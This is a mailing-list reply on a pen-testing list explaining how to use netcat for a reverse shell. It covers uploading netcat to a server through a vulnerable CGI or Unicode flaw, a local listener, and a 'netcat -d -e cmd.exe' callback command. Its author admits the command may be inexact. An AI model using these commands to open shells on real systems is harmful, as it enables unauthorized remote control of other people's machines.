Re: Ideas on netcat

[Forrest Rae <forrest () code-lab com>]

Hi Kartik,

One use is sending a shell back to yourself.    

First, uploaded netcat to a remote server, via unicode, vulnerably cgi,
or various other methods.  Second, On your local computer run netcat in
listen mode.  

$ netcat -l -p 8888

Third, execute netcat on remote server such that it sends a connection
back to you.  This is assuming that you can execute programs on the
remote server.  If X is installed on remote server you can send back a
xterm or rvxt.  Which is a little less complicated.  This command may
not be 100% correct, I am in a bit of a rush right now, I apologize.

netcat -d -e cmd.exe X.X.X.X 8888       (X.X.X.X is your IP)

The netcat listener you setup should display something like this:

XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX]
(X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX.

X:\>

This method can vary several ways.  Instead of sending a connection back
to your local computer, you can also setup a listener on the remote
server.  Assuming the remote server isn't firewalled.  

I am also interested in other ways people use netcat in pen testing. 
Would anyone else care to share?

-Forrest

Vo0d0o wrote:
> I would be grateful if anybody could throw some light on uses of netcat in 
> pen-testing.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/